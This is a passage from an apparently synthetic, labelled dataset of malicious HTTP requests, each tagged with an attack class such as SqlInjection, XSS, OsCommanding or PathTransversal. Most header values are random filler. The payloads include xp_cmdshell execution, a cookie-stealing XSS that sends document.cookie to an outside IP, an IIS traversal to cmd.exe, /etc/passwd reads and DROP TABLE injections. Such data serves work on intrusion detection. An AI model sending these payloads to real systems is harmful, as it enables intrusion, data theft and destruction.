snysknhthsn=8903&s1S1mir0hs=GTiouywxheenhyaehq&cpfnstZomo=)   (   |    (95=kqasr*)&etrs8=4dusetotr5ehenr&eefdnl3yil9wi=224937

End - Id: 37569
Start - Id: 43427
class: OsCommanding
GET /w.8vk.Zty@UzS/asti3/ef0l.asp?gqwhtacces=%2Fperl++%2Ftmp%2Fan.pl+++++-p2668&jtnnt=dnull&autoexec8BT7q=t0oe&pdAH8Y=%3A+in4+Rers%3A HTTP/1.1
Host: 11.61.190.55
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: *;q=0.3
Accept-Encoding: *
Accept-Language: r-u2mlogr
Cache-Control: no-cache
Client-ip: 44.129.23.74
Cookie: emnsmi=titIaseaos;ehsmr=jccicdo2gh6eswlw;Sn=1ef9feoPm;sogahiaphr=sst h;qcinsertie6b=771
Cookie2: $Version="368"
Date: Fri, 06 Jun 08 20:19:34 UTC
ETag: W/"G.Dsbs43MQWgijJk_"
Expect: oteD40
From: satt@ee2io.st
If-Modified-Since: Sun, 25 Dec 05 24:17:46 UTC
If-Unmodified-Since: Tue, 24 Feb 04 08:41:28 UTC
If-Match: *
If-None-Match: "J79v7LUWGKKvcRkLIe7m"
If-Range: *
Max-Forwards: 506
MIME-Version: 7.3
Pragma: no-cache
Proxy-Authorization: NTLM dDJvZWVyaElzaXJjaDllZW9vbHdxYXR0a2tucmExbmNhaW5kYVJl
Authorization: NTLM c3JlbGR0NG56b3J0aW9sZWtldGFzemlvaG9hb3lmZmVldG5M
Range: 5130-,89497-47998,93-50140
Referer: http://otpIch.st/trgo/ene9siHa/adRe/eeaFe2/tuSep.js
TE: deflate,trailers
Trailer: If-Range
User-Agent: Aiom7Oyro (mAFq6X; cQ@Vvxf; 69bCy6B7; hbzy3.G; sjq3K1)
UA-CPU: PowerPC
UA-Disp: 2710,0982,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 319x516
Via: 0.8 123.62.179.87, 0.1 www.n16n.shtml
Transfer-Encoding: xbtr; eehsf=X64Ipldh
Upgrade: Oed/2.9
Warning: 068 www.nEtms.tiff:791 "hzcetNt0o1a8aftr" "Thu, 03 Dec 09 09:45:12 UTC"
X-Forwarded-For: 15.27.14.91
X-Serial-Number: 208175776515023
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43427
Start - Id: 41080
class: SqlInjection
GET /naVNHo7qb9fy06.aspx?dyzfeeeicm1bs7o=Nao0rkalnetcatwb&hda=1461335&ao6aituruheelet=%27%3BEXECmaster.dbo.xp_cmdshell%27cmd.exe HTTP/1.1
Host: 232.114.202.107:80
Connection: sLtEbMhg
Accept: application/zip, video/*, image/*
Accept-Charset: iso-2022-kr, windows-1251;q=0.6, iso-2022-kr;q=0.6, x-mac-turkish;q=0.0, x-mac-greek;q=0.1
Accept-Encoding: 
Accept-Language: eraxo5r3-qtcP6pe, qh-nrXnde, myaal-r;q=0.2, 39g-h
Cache-Control: only-if-cached
Client-ip: 183.139.157.162
Cookie: i8i=nnsoror$%document]hB;2tt5=uf8I;@C8Q=mrl.NzzK;9D4positionpEU=dTGtK_;a6h=2080;53betweenunullqIwindow.open=4698369279
Cookie2: $Version="633"
Date: Fri, 09 Apr 10 05:05:58 GMT
ETag: "Xg@@-_KEAdcBHV47NM"
Expect: todx=mj6wd7;rmdo
From: ttytsmgz@lbtfnlH.de
If-Modified-Since: Fri, 05 Nov 04 18:58:00 GMT
If-Unmodified-Since: Mon, 16 Jan 06 13:54:23 UTC
If-Match: *
If-None-Match: "Kp2pS1G@tfT7YH6"
If-Range: Wed, 18 Nov 09 08:08:09 GMT
Max-Forwards: 27
MIME-Version: 7.6
Pragma: oltcia='goBi'
Proxy-Authorization: NTLM c3RhdnNuaU9hMWF0VHRnczFzMTF0N29wZWl4d2NlTG5ubg==
Authorization: Basic ZWVkbkg6dnNyYTliZDc=
Range: 000-,-068966
Referer: http://e9awe.st/esyNlamI/aerch/6im4S5/iaENat/llavtI.swf
TE: trailers,chunked;q=0.1
Trailer: From
User-Agent: Mozilla/0.7 (Machintosh; U; Mac OS X 5.3; ms-de; rv:1.9.3) Gecko/08838268
UA-CPU: Sparc
UA-Disp: 2063,773,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 194x0684
Via: HTTP/0.6 208.72.167.10
Transfer-Encoding: compress
Upgrade: Nb5/4.4, 2oss/0.9, ienmha/5.2, paie/0.1, sMat/4.9
Warning: 604 www.hKNbdI.gif "crapaattI" "Thu, 10 Jun 04 12:26:14 UTC"
X-Forwarded-For: 110.167.165.101
X-Serial-Number: 54708069609443708
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41080
Start - Id: 37847
class: LdapInjection
GET /ottvij/eTntpEerN7sMn3w/381MhF/tRjYAYpAKWf/ete6oi/lettr43grtsetcfdAiL1/tjrtjT92lEf/5eMVIRcA5Dycl.shtml?dp4nyg3is7t=7Gb%40T&evelHn=66&PV.5.7HY=%29++++%28+%7C+%28+++cn%3D*o+++%27brien*%29%28mail++++%3D*o%27brien*+%29&pn=7757&s3u8o5maCiue=addhuo&CfeSirtr=ttB&-selectinAOEa=++&acceptH8XoAoPPI9echo=92556456 HTTP/1.0
Host: 151.34.253.183
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-korean;q=0.7, ks_c_5601-1987;q=0.8, iso-8859-3
Accept-Encoding: 
Accept-Language: *
Cache-Control: eotsee='sehi'
Client-ip: 183.120.93.3
Cookie: efioD=a R~Roi'2gyde s%ygxml;ddirtnienc0aeeu=i8oiblweaonDosc;souswee=89869647
Cookie2: $Version="033"
Date: Tue, 27 Jun 06 07:59:47 UTC
ETag: "v.u7W79d5gfnlTy"
Expect: dNnesabo
From: dxmog@eeOtwtfr.com
If-Modified-Since: Sun, 14 Mar 04 06:29:18 UTC
If-Unmodified-Since: Wed, 30 Jan 08 18:20:54 GMT
If-Match: *
If-None-Match: "sELIoXwqQnT6CfBa9"
If-Range: Thu, 22 Jul 04 04:40:26 CET
Max-Forwards: 935
MIME-Version: 0.1
Pragma: keZrmoo='hpAe'
Proxy-Authorization: NTLM emh5cDRTbWlJb2U3anRzeXJkOW9pY3NiOWhhYWQ0aXNldA==
Authorization: NTLM b2VlZnR1aW5veXMwZHJldHJ1dGEzaHR0YXppZXRBblN2aHRobg==
Range: 853418-,-430
Referer: http://vnhRbhsO.ch/aw7p8h/pEeoe.wmn
TE: trailers,trailers,deflate
Trailer: Trailer
User-Agent: Mozilla/4.3 (X11; U; Unix 1.5; i1-yt; rv:1.8.8) Gecko/61257224
UA-CPU: 68000
UA-Disp: 780,4386,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 707x739
Via: aAgh/4.6 154.170.231.53
Transfer-Encoding: 1auu
Upgrade: uoE/5.1, iitjl/6.0
Warning: 381 69.182.116.155 "Nlsokote2jdearNL" "Fri, 14 Nov 08 18:53:43 CET"
X-Forwarded-For: 109.105.145.129
X-Serial-Number: 300384
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37847
Start - Id: 41127
class: SqlInjection
GET /cXN5gsy86bS/rtjraozttshhl/dAY/azSZ@ykgBzI/WSobjectMz61IEQ.shtml?ONd3yedm=eox&gPYU=Puj&actEnY=Zinr&ZtD=uI1Ua5eagt7elTc&nAsjmVWh=e&8tphh=28&twdIxx=89&reDur3nLEt7net=exec++xp_regwrite++%27HKEY_LOCAL_MACHINE%27%2C%27SOFTWARE%5CMicrosoft%5CMSSQLServer%5CClient%5CConnectTo%27%2C%27d9aeqn%27%2C%27REG_SZ%27%2C%27DBMSSOCN%2Chackersip%2C80%27 HTTP/1.0
Host: www.ymoc.cz
Connection: MenT3ld
Accept: image/png
Accept-Charset: *;q=0.5
Accept-Encoding: gzip;q=0.7, compress, identity
Accept-Language: j4ro-fetRnet;q=0.1, a-efBdcd;q=0.8
Cache-Control: tsiec=oRhnmE
Client-ip: 225.169.58.33
Cookie: hz=hzuoezu0;allEoP=elsah70nO3oownean;9OM5_fG=tFtwC_;Qxre4riajli=oB5.;aw8a=800412;oiokn1ebsnaAi0e=eEG
Cookie2: $Version="3"
Date: Thu, 07 Sep 06 04:01:01 UTC
ETag: W/"2aTlPu50dA@UKfxeZq"
Expect: raanjDia
If-Modified-Since: Tue, 08 Jan 08 22:48:23 CET
If-Unmodified-Since: Sun, 11 Jan 09 12:01:52 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 328
Pragma: no-cache
Authorization: kknwh 9eoe8nl=fNaroe
Referer: /gtodd/t6r44/ey4oxsi.swf
User-Agent: h7iZdQ-L http://www.rsqEa.de
UA-CPU: 68000
UA-Disp: 731,4085,32
Via: lan/5.7 5.30.78.209
Transfer-Encoding: deflate
Warning: 894 www.t2teem.tiff:4 "hItafp" 
X-Forwarded-For: 155.33.177.149
~~~~~: ~~~~~~~~~~~~

null

End - Id: 41127
Start - Id: 41887
class: SqlInjection
GET /aS/LcjxeEzhc/hshinrhcs/yassgtr6tnw/.pdS.LlSMcZ9-6E/AincludewWYSN686@-mYO/4@zXl/vQSJdDSRfl/lwvIamii/atimtc4a.jpeg?Sa=ehquswoRitUwto&GvbscriptumtF-L=zx0eszs4aelmew&erydiinrixDth=7354109&.g.Cthttp9inserte=%27+++++union+select+%40%40version%2C1%2C1%2C1--&vise9ess=yrnAt HTTP/1.1
Host: 156.85.137.204
Connection: keep-alive
Accept: image/*;q=0.1, image/jpeg, image/*
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: io5icra9-o, 6on-zmoo;q=0.4
Cache-Control: only-if-cached
Client-ip: 143.204.36.23
Cookie: gnavser5=rR;GIUe=4951;ncti8zltb=t;Cerro8=sosTs7sx:jn7qro0a4
Cookie2: $Version="03"
Date: Sun, 11 Nov 07 24:36:47 UTC
ETag: "gPXWXCyV9O4k_0w1BPB"
Expect: tRes=eraidrt;9eka
From: elee@hieitj.de
If-Modified-Since: Fri, 09 Jan 09 13:59:28 GMT
If-Unmodified-Since: Wed, 30 Jul 08 07:56:49 UTC
If-Match: *
If-None-Match: *
If-Range: Wed, 28 Mar 07 21:36:14 GMT
Max-Forwards: 70
MIME-Version: 8.7
Pragma: no-cache
Proxy-Authorization: Digest uri=http://www.8ios34Ss.be/GyNmnu/hNIaa/tnui75/Ns1n8sf/efisp.php3
Authorization: NTLM bXNlYnNwYWZvZXRhZnN6bmE1RW9IcmNEZGlvdG9sSGRhb2VpbXNoYWFFdG5zNzJ0
Range: 2764-93323,17883-91
Referer: http://www.setufe.com/rCtn.asp
TE: chunked;q=0.2,chunked,gzip
Trailer: Cache-Control
User-Agent: oxlyqJF4 http://www.scOned.com
UA-CPU: PowerPC
UA-Disp: 9347,2639,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 044x365
Via: 6.4 www.mezydhs.css, HTTP/9.0 94.9.254.44
Transfer-Encoding: deflate
Upgrade: 4sh/4.2, Rdhtih/8.1
Warning: 181 www.e4hach.tiff:99487 "eyten3eElsgEginsaoi" "Sun, 29 Feb 04 08:39:55 UTC"
X-Forwarded-For: 123.208.82.116
X-Serial-Number: 3139045
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41887
Start - Id: 42807
class: OsCommanding
GET /kL1i/iwUPHy/dU_621it/orSiaiodier7/WnodeZOWX3yo1.shtml?8N6s9=tmu HTTP/1.0
Host: www.fioO.biz
Connection: close
Accept: */*;q=0.4
Accept-Charset: macintosh, cp-936;q=0.7
Accept-Encoding: *
Accept-Language: gcxbHemv-eC9r5e;q=0.1
Cache-Control: max-age=95
Client-ip: 227.186.192.4
Cookie: BfKlsQA=65285035;lmnze6lnsea=dd;bonesr2wrlio=23.161.77.60    |cmd.exe /s;pinEot=1Ata3eZiasscxAso1
Date: Mon, 30 Jan 06 24:14:14 UTC
ETag: "kmVs4M0.KBXjIju"
Expect: n88vho
From: bsjdeeth@Ateetoae.st
If-Modified-Since: Sun, 05 Feb 06 18:03:56 UTC
If-Match: "nVLPA411UJ7n2tZpp8"
If-Range: Mon, 11 Jan 10 04:25:14 CET
Max-Forwards: 90
MIME-Version: 0.9
Authorization: NTLM YWJlcDJuY2VlM0FyYWlFd2lidExUZWhlc2Vjc2RuaGl1R25ubXRlbW9zbg==
Referer: http://mbc5Icm.gov/FeYhs/6anmtu.mpg
TE: gzip
User-Agent: 90E@sZL1Jv http://www.pdtaS.gov
Via: 6.2 www.8xo5htx.css
Transfer-Encoding: deflate
X-Serial-Number: 80616718934134
----: ------------------------------

null

End - Id: 42807
Start - Id: 47010
class: XSS
GET /Scak/jKFq4Z_VYn.css?TtygblVW7P=yl3&ouecoxereAo=5&X5mVGbNBqxnrm=2%7EsaopAhomeecT%40nen&o9=s6Jn.XY&HTcatkvbftp8fOY=9286754&ssyciaEepamki=%3Cmeta+++++http-equiv+%3D+%22+++refresh+++%22++content+%3D++%220%3Burl%3Djavascript%3A++++%5Bwindow.open%28%27http%3A%2F%2F191.19.129.44%2Fseon.php3%27%2Bdocument.cookie%29%3B%5D+%22+++%3E&tnsmhs=3647707&Realmid2=868&3positioncopyV2_7ca0=66799797&to1rufw=N+enatelneteevh&totJ=2Tomh%3Aee HTTP/1.0
Host: www.2en0ba.cz:80
Connection: keep-alive
Accept: application/*;q=0.2
Accept-Charset: cp-932;q=0.5, utf-7, euc-tw;q=0.8, euc-kr;q=0.9, iso-8859-9
Accept-Encoding: *;q=0.9
Accept-Language: ebem-and, cehd-dtat4, saOyNkoU-Et, xlehi-cot;q=0.3
Cache-Control: max-age=3517
Client-ip: 18.81.58.217
Cookie: etbgot=wp-;vvjH4=ovlknciymd
Cookie2: $Version="07"
Date: Fri, 13 Feb 09 11:03:13 CET
ETag: W/"iBHbcwj83EfCfSa5F3W"
Expect: 100-continue
From: siiia@cge3.it
If-Modified-Since: Sat, 08 Aug 09 10:50:52 GMT
If-Unmodified-Since: Fri, 25 Feb 05 24:12:07 UTC
If-Match: *
If-None-Match: "HrSlZAl90YhF.kM2@"
If-Range: "610W8G7WRQcXWAW"
Max-Forwards: 403
MIME-Version: 8.2
Pragma: no-cache
Proxy-Authorization: Basic YXN3clRGOmVyY2w=
Authorization: Basic bGNzZzphYXNy
Range: 5-22964
Referer: /s0ld/Df0ujt/rsc5nQNn.dll
TE: gzip;q=0.3,trailers
Trailer: Upgrade
User-Agent: rmba9snn (dtYwAhJT; ruJTnz97co; saPVurkOG; eQUr1.; e7.ADEMdE)
UA-CPU: Sparc
UA-Disp: 175,1584,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 7231x6416
Via: Ais/6.2 55.196.188.47, 2.1 88.186.140.32
Transfer-Encoding: aoav
Upgrade: me2u/0.5, c1ltE/4.5, nttiep/4.6, nsse/9.4, npleer/2.6
Warning: 525 www.rlfhnaia.jpeg "eIsh3fim5tmHdpgm5ei" 
X-Forwarded-For: 212.120.206.157
X-Serial-Number: 159927284892004319
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47010
Start - Id: 35810
class: XPathInjection
GET /1hY8/@DnetcatN0da8Ts-G/0ne4lryrc/nhN@j3n/rnL8cXQQg/cey8siE50c8.cfm?R0nhGaKn@likeEN=Eo%27+or+count%28+path%2Fchild%3A%3Anode%28%29%5Bposition%28++%29%3D%28%28+i%2Bj+%2B+++k+%2B++l%2B+++1%29%5D+++%7C++++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1+++++or++++%27ahsboe%27++++%3D++++%27+ri%27+or HTTP/1.0
Host: www.o2nnee.com
Connection: keep-alive
Accept: video/mpeg, audio/x-wav
Accept-Charset: *
Accept-Encoding: 
Accept-Language: E-TanAoen;q=0.5, nirMa0-ferrs;q=0.7, clio4TsI-bniyhw
Cache-Control: no-store
Client-ip: 25.4.155.47
Cookie: Kx5qtelnetHGD=dnte
Cookie2: $Version="52"
Date: Tue, 28 Aug 07 22:09:00 GMT
ETag: "F.kqxYY8TNuKf1u"
Expect: 100-continue
From: gH0ez@Sireoah.fr
If-Modified-Since: Sun, 02 May 10 10:38:04 GMT
If-Unmodified-Since: Sun, 18 Mar 07 19:14:10 CET
If-Match: "juhBjy0vAF6LU8iDRZ"
If-None-Match: "XJ7P-IofLZrNG9vGoss"
If-Range: Sat, 17 Jun 06 06:10:56 GMT
Max-Forwards: 9163
MIME-Version: 1.7
Pragma: xnfeltsr='ai'
Proxy-Authorization: luLc Okt8e=3llo
Authorization: Digest nc=007C8aF6
Range: 205-0247
Referer: http://enCsp4ni.fr/rlon.exe
TE: deflate;q=0.1
Trailer: If-None-Match
User-Agent: s6TmheG http://www.cnohAeyr.gov
UA-CPU: x86
UA-Disp: 861,959,8
UA-OS: WinNT
UA-Pixels: 4135x5853
Via: la7Ee/6.4 www.n2hrsn0s.jpeg, 3.4 www.xdoettIt.png, FTP/4.1 www.xj90Rei.jpg
Transfer-Encoding: compress
Upgrade: hljiT/5.4, axrst/8.8
Warning: 282 www.eOXt.htm "312bFgsaSoacoe" 
X-Forwarded-For: 43.11.206.228
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35810
Start - Id: 44358
class: OsCommanding
GET /iisadmpwd/..��..��..��..��..��../winnt/system32/cmd.exe?/c+ HTTP/1.1
Host: www.r7Afiete.it
Connection: close
Accept: text/plain;q=0.6, image/png;q=0.9
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=10
Client-ip: 206.144.99.228
Cookie: Btizoslto91er=cmdyxli
Cookie2: $Version="4"
Date: Sun, 20 May 07 07:14:20 CET
ETag: "Mp0.89pM9u@RmCsjjuH"
Expect: 100-continue
From: ks7mao@6esnaehk.it
If-Modified-Since: Wed, 27 Jan 10 06:09:38 CET
If-Unmodified-Since: Fri, 09 Nov 07 02:11:29 UTC
If-Match: *
If-None-Match: *
If-Range: ".dK6XfSKG.FdUc5gEh"
Max-Forwards: 57
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: iHauOk iIeethi7=3ndhh
Authorization: Digest response="750EEeFddf3CD4eDAAABC5d54CeAD4BE"
Range: 915-
Referer: /vmyiirk3/tomr/rnruO9xP/1wsedtuk.php4
TE: gzip;q=0.8
Trailer: Max-Forwards
User-Agent: aM2uognurOn
UA-CPU: x86
UA-Disp: 116,364,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 673x399
Via: 3.3 www.nea5ttS.css, sywoe/1.4 19.129.86.156:6, 8.9 73.48.109.8
Transfer-Encoding: deflate
Upgrade: 4et/8.8, is0/1.7, mseCwu/8.0
Warning: 732 www.nidnAqoh.js "estaore5gordngon0ar" "Fri, 26 Nov 04 13:07:04 GMT"
X-Forwarded-For: 179.136.110.96
X-Serial-Number: 94309776768789
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44358
Start - Id: 46297
class: PathTransversal
GET /epE/hN/ixu78/ij@mY3NVroNyNk7aO.HR/aguAoxQrb4OBSL.css?g@3WzgSX=zhf&d2ettin2=58431&iiehesiawAnlC=as%3F0y&pafed7a5rp=97Ewoidccndkeqrp&xnoatphall=63890&NtFHBu@RQ0WE=3332246&neodTnaattvmR=%2Fetc%2Fpasswd&ntyrdIawaqolDs=hac&K8iframeeIk6MLYa=hpUMXt&cbnetseetnanfoa=E%3Dnea&trspmf=107153 HTTP/1.0
Host: 127.196.220.27
Connection: close
Accept: video/mpeg;q=0.6, audio/*
Accept-Charset: *;q=0.5
Accept-Encoding: *
Accept-Language: *
Cache-Control: min-fresh=0
Client-ip: 54.146.114.194
Cookie: s8=hNauwilsGlt2aoe
Cookie2: $Version="98"
Date: Tue, 14 Nov 06 02:53:56 UTC
ETag: W/"l1XkmFGdW1ggoyh14oL"
Expect: 100-continue
From: tTSp@hlesers0h1.uk
If-Modified-Since: Thu, 13 Dec 07 21:04:21 UTC
If-Unmodified-Since: Thu, 13 Aug 09 03:42:56 UTC
If-Match: *
If-None-Match: "_@Pj9@Yx0T7NfWU60zlA"
If-Range: *
Max-Forwards: 73
MIME-Version: 8.6
Pragma: sg9w=nGl
Proxy-Authorization: Basic aGlFYTp3YXR0T24=
Authorization: Basic aEVTRHNkd0U6YXBhamNlZA==
Range: 5-,07-2
Referer: /usieI/gxrm/Phseat4.conf
TE: chunked,trailers
Trailer: If-Unmodified-Since
User-Agent: 1ylheww8/6.3.3.3
UA-CPU: 68000
UA-Disp: 542,0115,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 1380x824
Via: 5.3 www.gieQt5m.jpg
Transfer-Encoding: gzip
Upgrade: apEzao/7.4, nrcgos/4.1, Wles/0.2, Iiw/3.3
Warning: 165 170.166.64.203:01144 "oSte0enOhlsosme9awi" 
X-Forwarded-For: 207.118.108.52
X-Serial-Number: 0260257
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46297
Start - Id: 48797
class: XPathInjection
GET /ohX/tbntrirbthceb8eag/lj1tSQ@Y-E.MwgcA.sh?tnnByTtg=dXorshutdownennetcatjebantn&TohEsh=04++++or++++dttfel%2Fexsie%2Fyes1oe%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D40%5D+++++or+++++88765%3D HTTP/1.0
Host: 117.161.45.223:0
Connection: keep-alive
Accept: */*
Accept-Charset: iso-2022-jp;q=0.5, cp-950;q=0.9, windows-1251;q=0.0
Accept-Encoding: *
Accept-Language: ajuy-iehrp5ag;q=0.0, mRBa-ynCy, nn-us, zoitao-nney1t3, Hn14bnn8-06l
Cache-Control: no-store
Client-ip: 29.208.224.171
Cookie: i1ius=f0aderpsaiv4;ShtaccespY-p=mn;oio=ni;rb6roeoEh=9;co44t=tdbaltY+j;ehltftohaa=69
Cookie2: $Version="875"
Date: Sat, 26 Nov 05 03:00:03 CET
ETag: W/".EXNWZ0xRZ8f9BV"
Expect: 100-continue
From: rokltsth@ewew.uk
If-Modified-Since: Wed, 31 Mar 10 04:19:28 GMT
If-Unmodified-Since: Tue, 08 Sep 09 13:43:45 CET
If-Match: *
If-None-Match: *
If-Range: Wed, 11 Jul 07 11:59:00 CET
Max-Forwards: 1879
MIME-Version: 5.2
Pragma: aidoo='9Utgrr2e'
Proxy-Authorization: yeerry vuplo=4rasqRlo
Authorization: NTLM Z1NzbHJOYTZpazFlZ2hlcmFlcWFpa3I1YWVzaW1zV3JjcnNzb3JldE1jOA==
Range: -2670
Referer: http://www.eehxd8.gov/viP30csa/eddn.dll
TE: chunked,deflate,trailers
Trailer: If-Match
User-Agent: ytgggtd/1.3.7
UA-CPU: MIPS
UA-Disp: 065,1900,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 682x396
Via: HTTP/2.1 www.tsttIrr.htm, 2.7 113.189.150.76
Transfer-Encoding: compress
Upgrade: zT3/4.9, hrK1te/0.3, iIQppa/8.1, uhVyt/5.1
Warning: 435 www.dsxS.html:99 "eing" "Thu, 16 Jun 05 09:56:23 CET"
X-Forwarded-For: 29.255.158.60
X-Serial-Number: 9894674694471428
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48797
Start - Id: 35312
class: SqlInjection
GET /ett7mole.bin?hf=6&ivrejz7rgNhltr=7260079865&03rteDtpd9ca90=%27%3B+drop+++++table+++++1kb4afeNCMDf&Sil=56155&e7=R%2Bhrt&lnzlV=718555917&wvetueeja=%3A&t8jenokc4etoWOj=ro&nhoSbhcl=aN-%40h00S&oe=4550798&o67s3nooto5cI=eomno&t4ssr9ootprni=19409990 HTTP/1.1
Host: 74.66.66.130
Connection: close
Accept: */*;q=0.3
Accept-Charset: *;q=0.0
Accept-Encoding: *
Accept-Language: xer9nhs-EhYp;q=0.7
Cache-Control: no-cache
Client-ip: 94.110.74.242
Cookie: o1ecmtanN4inn=654087
Cookie2: $Version="1"
Date: Sat, 08 Aug 09 04:17:32 UTC
ETag: "@IHp0044BDAN5pIZOPDV"
Expect: 100-continue
From: Nlnin@tbpee7c5t.it
If-Modified-Since: Tue, 07 Dec 04 24:46:21 UTC
If-Unmodified-Since: Sun, 25 Jul 04 14:04:43 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 7384
MIME-Version: 8.1
Pragma: ea=wijkt
Proxy-Authorization: saoa Iaepe=rennc
Authorization: Digest nonce
Range: 414018-,3-
Referer: /sa4nthJ/seue0r8/oM4trih/Pht0d/6exnt.bin
TE: trailers,gzip
Trailer: Accept-Language
User-Agent: Mozilla/4.0 (Windows; U; Windows NT 2.4; ol-to; rv:1.6.5) Gecko/10718237
UA-CPU: Sparc
UA-Disp: 420,4746,32
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 198x9357
Via: 3.3 100.195.92.131, FTP/9.9 www.oshtcnx.css
Transfer-Encoding: gzip
Upgrade: wndma7/6.1, z9unl/1.7, lis/6.7
Warning: 727 226.166.210.3 "etaemlotia" "Mon, 31 Jan 05 16:57:11 UTC"
X-Forwarded-For: 111.116.93.90
X-Serial-Number: 8712797310669
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35312
Start - Id: 50071
class: XPathInjection
PUT /c8ehnMhowtqzvr/lrc0cOneua1/vBDsWGPtNyQjvwP/hWVHf2U0rx/yRS6re6santhsnirt4a/ajJLbURMEcmyBz3k.aspx? HTTP/1.1
Content-Length: 12
Content-Language: YcUqraOp,d,fpstoNHn
Content-Encoding: gzip
Content-Location: http://www.luiss5.cz/ue45cR/seeeou/t5rTso.exe
Content-MD5: Y3RueXMwZXNkcGVyYXNoZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 27 Jun 07 05:32:14 UTC
Last-Modified: Fri, 27 Apr 07 02:21:01 GMT
Host: www.a9rere8N.st
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: *
Accept-Encoding: *;q=0.3
Accept-Language: *;q=0.1
Cache-Control: max-age=27127
Client-ip: 52.121.59.129
Cookie: ctoeom8erteieoe=6;Iso=m9UEVhPuKVZ;mmka=srtl;ctUrmub=vynl1tem'    or   (i <   count(ici/child::text()) and  j     < count(w5erc/child::comment()) and    k   <    count(ii/child::*)  )     or     'itarE'   ='   ofs'     or;ae=Sedecidu35xi;an4eeohndwinrDe=7bwese
Cookie2: $Version="8"
Date: Sat, 07 Nov 09 21:14:49 UTC
ETag: W/"peW@pVjbg8Fbq9FYpc"
Expect: lpIt=mknoe0Tt;kR5Ho
From: edaaisla@oe0taiade.biz
If-Modified-Since: Mon, 03 May 10 05:46:14 GMT
If-Unmodified-Since: Tue, 11 Aug 09 12:00:25 GMT
If-Match: *
If-None-Match: *
If-Range: Sun, 03 Apr 05 15:38:21 GMT
Max-Forwards: 4
MIME-Version: 5.6
Pragma: 5tsinC='hnatj'
Proxy-Authorization: Digest username="7btlnr"
Authorization: Digest nc=9d5e303c
Range: -54961,-527946
Referer: http://ehnC.biz/s4s3/iTttw.pl
TE: deflate,chunked
Trailer: Warning
User-Agent: Mozilla/2.9 (Windows; U; Windows NT 6.0; rw-lT; rv:2.4.0) Gecko/64207728
UA-CPU: MIPS
UA-OS: Linux
UA-Color: color16
UA-Pixels: 254x290
Via: 6.4 220.172.231.118
Transfer-Encoding: 4oid; nE1e=ocan
Upgrade: t0zcmd/8.9, T6lh/5.7, i2nor/4.8
Warning: 605 248.98.66.189 "riez6d1cn52eo" "Fri, 17 Sep 04 20:29:57 CET"
X-Forwarded-For: 109.8.17.168
X-Serial-Number: 7706137339347
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Gt=rdejbr7ec

End - Id: 50071
Start - Id: 45577
class: PathTransversal
GET /evEfozettnBbd/nnpyZpdmhM/imboinmrsvmNs8Llccib/iv0s9htaa/NLNi@fromphpJA9J.php?nbaid=8eT444&8t=s8&0Tnbxeo3=el1d&omswSrrr=2alheaahen&nni8sfohrlb=7721&stmtqane1phnCo=6210267047&7idew5d9T=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FInetpub%2Fiissamples%2Filtiatll%2Flatr%2Frinamenala%2Fetteti.php&iwoU3ehr2eis=sISbxu&Csi8s4tod=lnmiabino%25elgvwefta8%3D&nueees4enTha3n=pu&ltRldhhPsta=aqUzoU HTTP/1.0
Host: www.tcsqp.uk
Connection: close
Accept: */*;q=0.5
Accept-Charset: windows-1254, x-mac-icelandic;q=0.9
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: irauirtn=oea7e4vn
Client-ip: 210.46.171.191
Cookie: rnryest5s=c2(b$ tt ai0ai0ir O;luemoom4=Woetan
Cookie2: $Version="74"
Date: Thu, 18 Aug 05 19:58:13 UTC
ETag: "7BJnOXhoOC90uhha"
Expect: roaemt
From: wtdlbok@elsFbheed.st
If-Modified-Since: Fri, 23 Apr 10 17:37:28 CET
If-Unmodified-Since: Wed, 07 Mar 07 07:53:51 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 1633
MIME-Version: 2.5
Pragma: DQ='ueiti'
Proxy-Authorization: NTLM ZXBzeGFlbkxta3QwRGRkcnB5YXBtcTBGbmU4YXJuY2FpTjhkaGx0
Authorization: e6tih ntad3xr=rahhyp
Range: 286-378831
